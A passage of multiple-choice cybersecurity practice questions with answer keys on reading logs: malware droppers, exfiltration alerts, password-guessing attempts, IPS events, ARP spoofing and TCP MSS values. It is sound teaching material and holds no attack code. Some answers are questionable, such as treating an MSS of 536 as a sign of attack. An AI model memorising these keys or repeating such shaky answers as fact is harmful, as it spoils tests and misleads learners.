(C)❌ The Windows Registry contains system settings, not detailed error logs.
(D)❌ Task Manager shows running processes but doesn’t record historical crashes.
During the exam, how many log entries should you expect to analyze at a time?
A) Hundreds of log lines from multiple sources.
B) Short logs with 10-20 lines, focusing on key events.
C) A live stream of logs requiring real-time analysis.
D) Only system-wide logs, ignoring individual applications.
✅ Correct Answer: B - Short logs with 10-20 lines, focusing on key events.
🔹 Explanation of Options:
(A)❌ Analyzing hundreds of lines is impractical for an exam scenario.
(B)✅ Exam questions provide short logs with key indicators for analysis.
(C)❌ The exam does not require live log monitoring.
(D)❌ Individual application logs are important for troubleshooting.
A log entry shows:
🔹 Event ID 5409 → “Admin alert generated: Malicious macro detected in Q3-Financials.docx”
What does this indicate?
A) The system administrator was notified about a potential security risk.
B) The document was deleted automatically.
C) The user disabled security warnings and ran the macro.
D) The macro was harmless and ignored.
✅ Correct Answer: A - The system administrator was notified about a potential security risk.
🔹 Explanation of Options:
(A)✅ An admin alert means security teams were informed of a threat.
(B)❌ The document was quarantined, not deleted.
(C)❌ The logs indicate the macro was blocked, not executed.
(D)❌ Since the macro was flagged as malware, it was not harmless.
A user downloads and executes a file named setup.exe, which is later flagged by antivirus as suspicious. However, the user ignores the warning and allows it to run. What is the most likely purpose of setup.exe?
A) It is a legitimate application, and the antivirus produced a false positive.
B) It is a Stage One Dropper, designed to download additional malware.
C) It is the primary malware that will immediately start stealing data.
D) It is a normal update process required by the operating system.
✅ Correct Answer: B - It is a Stage One Dropper, designed to download additional malware.
🔹 Explanation of Options:
(A)❌ Antivirus alerts can be false positives, but ignoring them can be risky. In this case, further suspicious activity follows.
(B)✅ The log indicates that setup.exe downloads another file (update.bin), meaning it serves as a Stage One Dropper.
(C)❌ The actual malware (Stage Two) executes later, after setup.exe completes its job.
(D)❌ Malware often disguises itself as updates, but this file initiated unauthorized connections.
After setup.exe runs, the system logs show an outbound connection to a remote server (92.168.47.81), and a binary file update.bin is downloaded. What does this indicate?
A) The system is receiving an official update.
B) The system is infected, and Stage Two malware is being delivered.
C) The file update.bin is likely a harmless binary file.
D) The connection is normal network activity.
✅ Correct Answer: B - The system is infected, and Stage Two malware is being delivered.
🔹 Explanation of Options:
(A)❌ While the file is named “update.bin,” malware frequently disguises itself as updates.
(B)✅ The log shows a Stage One Dropper fetching additional malware from an external IP, confirming an attack.
(C)❌ Binary files are not inherently malicious, but in this case, the behavior is highly suspicious.
(D)❌ The connection is not normal because it was triggered by a suspicious executable.
Shortly after update.bin is executed, the antivirus software stops running unexpectedly. What does this indicate?
A) A routine system update is taking place.
B) The malware is disabling security controls to avoid detection.
C) The antivirus software is overloaded and crashed.
D) The antivirus found no threats, so it shut down.
✅ Correct Answer: B - The malware is disabling security controls to avoid detection.
🔹 Explanation of Options:
(A)❌ System updates do not typically disable antivirus programs.
(B)✅ Many types of malware disable antivirus programs before deploying payloads.
(C)❌ While antivirus crashes happen, it is unlikely to coincide with a suspicious file execution.
(D)❌ Antivirus software does not shut down just because no threats are found.
After the execution of update.bin, a new process called malproc.exe appears in the system logs. What does this suggest?
A) A new, legitimate application was installed.
B) The system is running an unknown malicious process.
C) The update process completed successfully.
D) A software license verification tool was executed.
✅ Correct Answer: B - The system is running an unknown malicious process.
🔹 Explanation of Options:
(A)❌ If this were a legitimate application, it would not have followed an unauthorized binary download.
(B)✅ Malware frequently spawns new processes, like malproc.exe, which indicate malicious activity.
(C)❌ Update.bin was a malicious file, meaning this process is part of an attack.
(D)❌ No indication suggests that this process is for license verification.
The security team detects unusual outbound traffic from malproc.exe, and a breach alert is generated. What is the most likely explanation?
A) The system is performing normal background data synchronization.
B) The malware is exfiltrating stolen data to an attacker-controlled server.
C) The network administrator is troubleshooting a connection.
D) The endpoint detection system is malfunctioning.
✅ Correct Answer: B - The malware is exfiltrating stolen data to an attacker-controlled server.
🔹 Explanation of Options:
(A)❌ Normal data synchronization does not follow malware execution.
(B)✅ Data exfiltration is a common post-infection activity, especially after unauthorized outbound traffic is detected.
(C)❌ No log entry suggests administrator involvement.
(D)❌ The breach alert was triggered due to actual suspicious activity, not a system malfunction.
The security team notices a file named update.bin in the logs. What does the .bin extension indicate?
A) The file contains non-text binary data, possibly compiled code.
B) The file is an encrypted text document.
C) The file is a harmless software update.
D) The file cannot be executed.
✅ Correct Answer: A - The file contains non-text binary data, possibly compiled code.
🔹 Explanation of Options:
(A)✅ .bin files contain binary data, often used for software updates or malware payloads.
(B)❌ .bin files are not encrypted text files.
(C)❌ The file may be disguised as an update, but behavior in the logs suggests malware.
(D)❌ Binary files can be executed, depending on the system and file permissions.
An endpoint detection system (EDS) logs a breach alert due to malware infection and data exfiltration. What should be the first response?
A) Immediately disconnect the affected system from the network.
B) Delete the logs and restart the system.
C) Manually remove malproc.exe and resume normal operations.
D) Allow the process to continue to observe further activity.
✅ Correct Answer: A - Immediately disconnect the affected system from the network.
🔹 Explanation of Options:
(A)✅ Disconnecting the system prevents further damage and stops malware from communicating with an attacker.
(B)❌ Deleting logs erases crucial forensic evidence needed for investigation.
(C)❌ Simply removing the process does not address potential hidden malware components.
(D)❌ Allowing the malware to continue running increases the risk of data loss.
A security administrator is reviewing OS security logs and notices the following failed login attempts:
Time User Event IP Address Status Details (PIN)
16:45:01 jdoe Login Attempt 192.55.233.89 Failed 123456
16:45:03 jdoe Login Attempt 192.55.233.89 Failed 123457
16:45:05 jdoe Login Attempt 192.55.233.89 Failed 123458
16:45:07 jdoe Login Attempt 192.55.233.89 Failed 123459
16:45:09 jdoe Login Attempt 192.55.233.89 Failed 123450
16:45:11 jdoe Account Locked 192.55.233.89 N/A Too many failed attempts
What type of password attack does this log indicate?
A) Dictionary attack
B) Credential stuffing attack
C) Brute force attack
D) Phishing attack
✅ Correct Answer: C - Brute force attack
🔹 Explanation of Options:
(A)❌ Dictionary attacks use common words, but this attack is sequentially guessing numeric PINs.
(B)❌ Credential stuffing uses previously stolen usernames and passwords, which is not evident here.
(C)✅ A brute force attack tries every possible combination systematically, as seen with sequential PIN attempts.
(D)❌ Phishing attacks rely on deception rather than direct login attempts.
A security analyst is reviewing failed login attempts and notices the following:
Time User Event IP Address Status Details (Password Attempt)
17:01:01 msmith Login Attempt 192.55.233.89 Failed puppy
17:01:03 msmith Login Attempt 192.55.233.89 Failed baseball
17:01:05 msmith Login Attempt 192.55.233.89 Failed cupcake
17:01:07 msmith Login Attempt 192.55.233.89 Failed companion
17:01:09 msmith Login Attempt 192.55.233.89 Failed loved
17:01:11 msmith Account Locked 192.55.233.89 N/A Too many failed attempts
Which type of password attack does this log indicate?
A) Brute force attack
B) Dictionary attack
C) Rainbow table attack
D) Social engineering attack
✅ Correct Answer: B - Dictionary attack
🔹 Explanation of Options:
(A)❌ Brute force attacks try all possible combinations, but here, common words are being tested.
(B)✅ Dictionary attacks use a list of common words or phrases, which matches this pattern.
(C)❌ Rainbow table attacks involve precomputed hashes, which are not used in direct login attempts.
(D)❌ Social engineering attacks manipulate people, not password systems.
A company enforces an account lockout policy after five failed login attempts within one minute. A user’s account was locked after multiple failed login attempts using common words. What is the primary purpose of this security measure?
A) To prevent brute force attacks
B) To block users from forgetting their passwords
C) To improve network performance
D) To allow unlimited password guesses
✅ Correct Answer: A - To prevent brute force attacks
🔹 Explanation of Options:
(A)✅ Lockout policies are designed to stop repeated login attempts, which are a hallmark of brute force and dictionary attacks.
(B)❌ Lockout policies help security, not user memory issues.
(C)❌ Network performance is unrelated to login attempts.
(D)❌ The opposite is true—this policy restricts password guessing.
Which of the following best differentiates a brute force attack from a dictionary attack?
A) A brute force attack only targets numeric passwords, while a dictionary attack targets alphabetic passwords.
B) A dictionary attack uses common words, while a brute force attack systematically tests all possible combinations.
C) A brute force attack can only be used on online systems, while a dictionary attack is used offline.
D) A dictionary attack is faster than a brute force attack because it only targets administrator accounts.
✅ Correct Answer: B - A dictionary attack uses common words, while a brute force attack systematically tests all possible combinations.
🔹 Explanation of Options:
(A)❌ Brute force attacks can target any type of password, not just numbers.
(B)✅ Dictionary attacks use a predefined list of common passwords, while brute force attacks systematically try every possibility.
(C)❌ Both attacks can be used in online and offline environments.
(D)❌ Dictionary attacks can be faster, but they are not limited to administrator accounts.
A security analyst notices repeated login attempts from multiple IP addresses trying common passwords like “password123”, “admin”, and “letmein”. What attack type does this indicate?
A) Dictionary attack
B) Brute force attack
C) Credential stuffing
D) Man-in-the-middle attack
✅ Correct Answer: A - Dictionary attack
🔹 Explanation of Options:
(A)✅ The use of common passwords suggests a dictionary attack.
(B)❌ A brute force attack would try all possible combinations, not just common words.
(C)❌ Credential stuffing uses stolen username-password pairs, not common words.
(D)❌ Man-in-the-middle attacks intercept communications, rather than guessing passwords.
A hacker is testing password variations like “Summer2023!”, “S!ummer2023”, and “S@mm3r2023”. What type of attack is being used?
A) Brute force attack
B) Dictionary attack
C) Hybrid attack
D) Phishing attack
✅ Correct Answer: C - Hybrid attack
🔹 Explanation of Options:
(A)❌ Brute force attacks try all possible passwords, but this attack is using word-based variations.
(B)❌ Dictionary attacks use basic words without many modifications.
(C)✅ Hybrid attacks mix dictionary words with slight alterations (symbols, numbers).
(D)❌ Phishing relies on social engineering, not automated password guessing.
A security analyst reviews an IPS log and finds the following entries:
Event ID Severity Description Action Taken
4105 High SQL Injection Attack Detected Blocked
4110 High Buffer Overflow Attempt Blocked
4120 High External Brute Force Attack Blocked
4130 High Data Exfiltration Detected Alerted
3301 Medium ICMP Echo Request Flood Monitored
Which event requires immediate investigation?
A) Event 4105 - SQL Injection Attack
B) Event 4110 - Buffer Overflow Attempt
C) Event 4130 - Data Exfiltration Detected
D) Event 3301 - ICMP Echo Request Flood
✅ Correct Answer: C - Event 4130 (Data Exfiltration Detected)
🔹 Explanation of Options:
(A)❌ SQL injection is dangerous, but it was blocked, so no further investigation is needed.
(B)❌ A buffer overflow attempt can lead to system takeover, but since it was blocked, it’s not an immediate concern.
**(C)✅ Data exfiltration is the most severe event because it was only alerted, meaning it was not blocked, and sensitive data may have been stolen.
(D)❌ ICMP flood attacks (ping floods) can impact network performance, but they are not as critical as data exfiltration.
Which of the following statements is true regarding Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS)?
A) IDS actively blocks attacks, while IPS only logs them.
B) If an event is blocked, it was handled by an IPS.
C) An IDS can prevent attacks, while an IPS only detects them.
D) An IPS does not alert administrators, only logs them.
✅ Correct Answer: B - If an event is blocked, it was handled by an IPS.
🔹 Explanation of Options:
(A)❌ IPS actively blocks threats, while IDS only detects and alerts.
(B)✅ An IPS can both detect and block attacks, so a blocked event confirms that an IPS was used.
(C)❌ IDS cannot prevent attacks, it can only alert security teams.
(D)❌ IPS can both block attacks and alert administrators about critical security events.
A network administrator notices a large number of suspicious ARP replies coming from an internal IP address. What is the most likely attack taking place?
A) SQL Injection
B) ARP Spoofing
C) ICMP Flood Attack
D) Brute Force Attack
✅ Correct Answer: B - ARP Spoofing
🔹 Explanation of Options:
(A)❌ SQL Injection targets databases, not network communications.
(B)✅ ARP Spoofing is an attack where a malicious actor sends fake ARP replies to redirect network traffic through their system.
(C)❌ ICMP floods are DoS attacks using ping requests, not ARP manipulation.
(D)❌ Brute force attacks involve repeated login attempts, not ARP modifications.
An IPS log shows repeated ARP Spoofing attempts originating from an internal IP address (192.168.1.50). What does this indicate?
A) The attack is coming from an external hacker.
B) The attack is being performed by an insider threat.
C) The event is likely a false positive.
D) The attack is a brute force login attempt.
✅ Correct Answer: B - The attack is being performed by an insider threat.
🔹 Explanation of Options:
(A)❌ ARP Spoofing requires the attacker to be inside the local network.
(B)✅ Since the attacker is using an internal IP, it is likely an insider threat (or an infected device inside the network).
(C)❌ While false positives happen, repeated ARP Spoofing attempts are highly suspicious.
(D)❌ ARP Spoofing manipulates network communications, not login credentials.
A brute force login attempt was detected on a company’s web server. The IPS blocked the attacker’s IP address. What should the next step be?
A) No further action is required since the IPS blocked it.
B) Investigate the attacker’s source and block their IP permanently if needed.
C) Disable the IPS since it is already handling attacks.
D) Reset all user passwords immediately.
✅ Correct Answer: B - Investigate the attacker’s source and block their IP permanently if needed.
🔹 Explanation of Options:
(A)❌ Even though the attack was blocked, an investigation should still be conducted to assess further risk.
(B)✅ The attacker may attempt different methods to bypass security, so blocking their IP at the firewall is a good proactive step.
(C)❌ Disabling the IPS would remove a critical security layer, increasing risk.
(D)❌ Resetting all user passwords is unnecessary unless there is evidence of account compromise.
A cybersecurity analyst reviews the following IPS log:
Event ID Severity Description Action Taken
4105 High SQL Injection Attack Detected Blocked
4110 High Buffer Overflow Attempt Blocked
4125 High Internal Network Scan Blocked
4130 High Data Exfiltration Detected Alerted
4301 Medium Excessive Login Attempts Monitored
Which event should the security team investigate first?
A) Event 4105 - SQL Injection Attack
B) Event 4125 - Internal Network Scan
C) Event 4130 - Data Exfiltration Detected
D) Event 4301 - Excessive Login Attempts
✅ Correct Answer: C - Event 4130 (Data Exfiltration Detected)
🔹 Explanation of Options:
(A)❌ SQL Injection is dangerous, but since it was blocked, no immediate action is required.
(B)❌ Network scanning is often used for reconnaissance, but it does not indicate immediate data theft.
(C)✅ Data exfiltration is a serious threat because it means sensitive data may have been stolen. Since it was only alerted (not blocked), it requires urgent investigation.
(D)❌ Excessive login attempts may suggest brute force, but it was only monitored, not immediately dangerous.
A security analyst reviews the following network log:
Date Time Interface Action Details
02/25/2025 14:10:01 Gi0/1 Allow Inbound: 192.168.1.105 → 192.168.1.10 (TCP/80)
02/25/2025 14:10:05 Gi0/1 Allow Outbound: 192.168.1.15 → 8.8.8.8 (UDP/53)
02/25/2025 14:10:10 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
02/25/2025 14:10:12 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
02/25/2025 14:10:20 Gi0/1 Allow Inbound: 192.168.1.10 → 192.168.1.20 (TCP/443)
02/25/2025 14:10:25 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
02/25/2025 14:10:27 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
Which of the following is the most likely conclusion?
A) Normal network activity with internal web traffic.
B) An external attacker attempting to scan the network.
C) An ARP Spoofing attack in progress.
D) A failed DNS query due to an incorrect firewall rule.
✅ Correct Answer: C - An ARP Spoofing attack in progress.
🔹 Explanation of Options:
(A)❌ Normal traffic would not involve repeated MAC address changes for the same IP.
(B)❌ A network scan typically involves multiple probing requests over different ports, not ARP changes.
(C)✅ The MAC address changes rapidly between two different values for the same IP address, a classic sign of ARP spoofing.
(D)❌ No evidence of a failed DNS query exists in the logs; the DNS query to 8.8.8.8 was allowed.
A security administrator notices multiple ARP replies from a single IP address, mapping to different MAC addresses in a short time frame. What should be the best course of action?
A) Block the IP address at the firewall.
B) Investigate the source of ARP replies and check for MITM attack activity.
C) Disable all ARP traffic on the network.
D) Ignore the event since ARP traffic naturally fluctuates.
✅ Correct Answer: B - Investigate the source of ARP replies and check for MITM attack activity.
🔹 Explanation of Options:
(A)❌ Blocking the IP at the firewall is ineffective since ARP operates at Layer 2, not Layer 3.
(B)✅ Investigating ARP behavior is the correct approach, as repeated MAC changes indicate potential ARP spoofing and possible Man-in-the-Middle (MITM) activity.
(C)❌ Disabling ARP is not feasible as it is necessary for network communication.
(D)❌ While some ARP changes occur naturally, rapid flipping between MAC addresses is highly suspicious.
A network administrator is analyzing router logs and sees an entry denying inbound UDP traffic on Port 137 (NetBIOS) from 192.168.1.105 to 192.168.1.255 (broadcast).
What is the most likely interpretation of this log entry?
A) A network-wide NetBIOS broadcast attempt that was blocked.
B) A misconfigured firewall rule blocking legitimate traffic.
C) A brute force attack on an internal web server.
D) Normal DNS resolution traffic.
✅ Correct Answer: A - A network-wide NetBIOS broadcast attempt that was blocked.
🔹 Explanation of Options:
(A)✅ NetBIOS over UDP 137 is used for name resolution and can be used for enumeration. Blocking it helps prevent unauthorized access.
(B)❌ While a misconfiguration is possible, blocking NetBIOS broadcasts is often intentional for security reasons.
(C)❌ A brute force attack typically involves login attempts over services like SSH or RDP, not NetBIOS.
(D)❌ DNS queries typically use UDP port 53, not 137.
A network administrator sees the following router log entry:
Date Time Interface Action Details
03/01/2025 15:23:10 Gi0/1 Allow Outbound: 192.168.1.15 → 8.8.8.8 (UDP/53)
03/01/2025 15:23:12 Gi0/1 Allow Outbound: 192.168.1.13 → 8.8.4.4 (UDP/53)
03/01/2025 15:23:15 Gi0/1 Allow Inbound: 192.168.1.10 → 192.168.1.20 (TCP/80)
03/01/2025 15:23:20 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
03/01/2025 15:23:23 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
03/01/2025 15:23:26 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
What should the administrator do next?
A) Investigate for possible ARP Spoofing.
B) Shut down all DNS servers immediately.
C) Ignore the logs since ARP changes occur naturally.
D) Block all outbound HTTP traffic.
✅ Correct Answer: A - Investigate for possible ARP Spoofing.
🔹 Explanation of Options:
(A)✅ The repeated MAC address changes indicate a possible ARP Spoofing attack and should be investigated.
(B)❌ DNS servers are unrelated to ARP spoofing and should not be shut down.
(C)❌ ARP changes can happen naturally, but rapid switching between MAC addresses is suspicious.
(D)❌ HTTP traffic (TCP/80) is unrelated to ARP spoofing.
1️⃣ Scenario: Investigating a Suspicious File
You are an incident response analyst investigating a suspicious email attachment named invoice.pdf. You extract its metadata and find the following details:
File Type: Executable (.exe)
File Hash (SHA-256): Matches a known malware signature
Creation Date: 2012, but the email claims it was created today
Owner: User “Joe,” who received the email and opened it
What is the best action to take based on this metadata?
A) Allow the file since it has a “.pdf” extension
B) Block the file and prevent further execution
C) Rename the file to “invoice.pdf.exe” for better visibility
D) Ignore the alert since no antivirus flagged it as malware
✅ Correct Answer: B) Block the file and prevent further execution
📌 Explanation:
The file extension says .pdf, but the actual file type is .exe, which is suspicious.
The SHA-256 hash matches a known malware signature, confirming it’s malicious.
The creation date mismatch is another red flag.
The best action is to block the file and ensure it cannot execute further.
A cybersecurity team receives a report of suspicious file downloads. A user downloads a file named report.pdf, but a forensic scan reveals that it is actually a JPEG image.
What does this indicate?
A) Normal behavior, since file extensions can be arbitrary
B) A harmless mislabeling of a file
C) A potentially suspicious or malicious file
D) A problem with the user’s operating system
✅ Correct Answer: C) A potentially suspicious or malicious file
📌 Explanation:
On Windows, file types are determined by extensions (.pdf, .jpg).
On Linux/Unix, file types are determined by the first bytes of the file.
If the extension and actual file type don’t match, it could indicate a malware attempt, such as a disguised executable.
Your organization suffered a phishing attack where multiple users downloaded a malicious file named update.bin. To prevent future infections, you decide to block the malware.
Which method is the most effective way to prevent future downloads?
A) Block the file based on its name
B) Block all .bin file downloads
C) Block the file using its MD5/SHA-256 hash
D) Disable all email attachments in the network
✅ Correct Answer: C) Block the file using its MD5/SHA-256 hash
📌 Explanation:
MD5/SHA-256 checksums are unique to every file, making them a reliable way to block malware.
Blocking by file name or extension (.bin) is ineffective, as attackers can rename the file.
Disabling all email attachments is too restrictive and impractical.
A security team notices an attacker attempting multiple login attempts using passwords such as:
Admin2024!
Secure#123
Qwerty1!
What type of attack is this?
A) Brute Force Attack
B) Dictionary Attack
C) Hybrid Attack
D) Credential Stuffing
✅ Correct Answer: C) Hybrid Attack
📌 Explanation:
The attacker is using a dictionary attack (common words like admin, secure, qwerty).
They are modifying the words using numbers and symbols (2024!, #123, 1!).
This combination of dictionary and brute-force techniques defines a Hybrid Attack.
A user reports they cannot access a company website and receives the following error:
“HTTP 400 - Bad Request”
What is the most likely cause?
A) The server is overloaded
B) The client sent a malformed request
C) The page was moved permanently
D) The user does not have permission to access the page
✅ Correct Answer: B) The client sent a malformed request
📌 Explanation:
HTTP 400 (Bad Request) happens when the client sends a request the server cannot understand.
Common causes include:
Malformed syntax (e.g., missing characters in a URL).
Incorrect request formatting in APIs.
Corrupt browser cache/cookies.
You analyze a router log and notice:
Multiple ARP reply packets for the same IP (192.168.1.10) but with different MAC addresses
Frequent changes in MAC addresses within seconds
What does this likely indicate?
A) Normal behavior due to network updates
B) A sign of an ARP spoofing attack
C) A brute force attack
D) A failing network adapter
✅ Correct Answer: B) A sign of an ARP spoofing attack
📌 Explanation:
ARP spoofing occurs when an attacker manipulates ARP tables by sending false ARP replies.
Frequent MAC address changes linked to the same IP is a clear indicator of ARP spoofing.
Attackers use this to intercept traffic and launch Man-in-the-Middle (MITM) attacks.
You review a security log and notice:
Event ID Description Severity Action Taken
4105 SQL Injection Attempt High Blocked
4120 Brute Force Attack High Blocked
4130 Data Exfiltration Detected High Alerted
Which event should be investigated first?
A) 4105 - SQL Injection Attempt
B) 4120 - Brute Force Attack
C) 4130 - Data Exfiltration Detected
D) None, because all attacks were blocked
✅ Correct Answer: C) 4130 - Data Exfiltration Detected
📌 Explanation:
SQL Injection & Brute Force Attacks were blocked, meaning no immediate risk.
Data Exfiltration was only “alerted,” not blocked – meaning data may have been stolen.
The highest priority in an investigation is data loss prevention.
During a network capture analysis, you notice a SYN packet with the following details:
Transmission Control Protocol, Src Port: 54321, Dst Port: 80
Flags: SYN
Maximum Segment Size (MSS): 1460
Given that the MSS value is 1460, what is the likely MTU (Maximum Transmission Unit) size of this network?
A) 1460 bytes
B) 1500 bytes
C) 1400 bytes
D) 1480 bytes
Correct Answer: ✅ B) 1500 bytes
Explanation:
MSS is calculated by subtracting the TCP (20 bytes) and IP (20 bytes) headers from the MTU.
Formula: MSS = MTU - (TCP Header + IP Header) → 1460 = MTU - 40.
Solving for MTU: MTU = 1460 + 40 = 1500 bytes.
A) 1460 bytes is incorrect → MSS is not the MTU; it’s just the data portion.
C) 1400 bytes is incorrect → Would indicate a non-standard MTU (which is rare).
D) 1480 bytes is incorrect → This does not match the formula.
A security analyst is troubleshooting slow network performance and notices that packets are smaller than expected. What is a likely reason?
A) The client and server negotiated a lower MSS than expected
B) The network is dropping SYN packets
C) The client is using UDP instead of TCP
D) The firewall is blocking TCP connections
Correct Answer: ✅ A) The client and server negotiated a lower MSS than expected
Explanation:
A) MSS negotiation can lower packet sizes → If the client and server agree on a smaller MSS, TCP segments will be smaller than expected, reducing performance.
B) Dropped SYN packets would cause connection failures, not just slow performance.
C) UDP does not use MSS, so this is unrelated.
D) If TCP connections were blocked, there would be no communication at all.
A cybersecurity analyst detects a series of SYN packets with an MSS value of 536 during an investigation. What might this indicate?
A) Normal TCP communication
B) A possible attack attempt
C) A network misconfiguration
D) An overloaded firewall
Correct Answer: ✅ B) A possible attack attempt
Explanation:
MSS values of 536 are abnormally low and are often used by attackers to evade detection by forcing smaller packet sizes.
A) Normal TCP communication usually has MSS values like 1460 or 1200.
C) While possible, a misconfiguration is less likely than an attack.
D) MSS does not directly relate to firewall performance.
